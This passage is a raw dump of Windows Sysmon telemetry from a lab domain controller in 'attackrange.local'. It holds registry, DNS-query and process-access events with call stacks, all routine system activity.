NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\ProfileNameattackrange.local 13241300x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\Descriptionattackrange.local 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.150{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.150{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.325{733EE690-3DF9-5F80-1500-000000007F01}1356eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.325{733EE690-3DF9-5F80-1500-000000007F01}1356ladcweoim1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.269{733EE690-3DF9-5F80-1200-000000007F01}1208wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.267{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.218{733EE690-3DF9-5F80-1500-000000007F01}1356win-dc-7216619.attackrange.local0fe80::b7:3f2b:f5ff:fef1;fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.107{733EE690-3DF9-5F80-1000-000000007F01}1132win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.361{733EE690-3DF9-5F80-1000-000000007F01}1132isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:40.326{733EE690-3DF9-5F80-1000-000000007F01}1132win-dc-7216619.attackrange.local0fe80::b7:3f2b:f5ff:fef1;2001:0:2851:782c:b7:3f2b:f5ff:fef1;fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.279{733EE690-3DF9-5F80-1500-000000007F01}1356win-dc-7216619.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:41.103{733EE690-3DF9-5F80-1500-000000007F01}1356win-dc-72166191460-C:\Windows\System32\svchost.exe 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.274{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.289{733EE690-3DF9-5F80-1500-000000007F01}1356attackrange.local0type: 2 win-dc-7216619.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:43.286{733EE690-3E09-5F80-3100-000000007F01}3064win-dc-7216619.attackrange.local0fe80::b7:3f2b:f5ff:fef1;2001:0:2851:782c:b7:3f2b:f5ff:fef1;fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.843{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.843{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.796{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ttip2415.cfp.ps12020-10-09 10:40:46.796 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.781{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.765{733EE690-3E2E-5F80-7700-000000007F01}45764596C:\Windows\system32\conhost.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 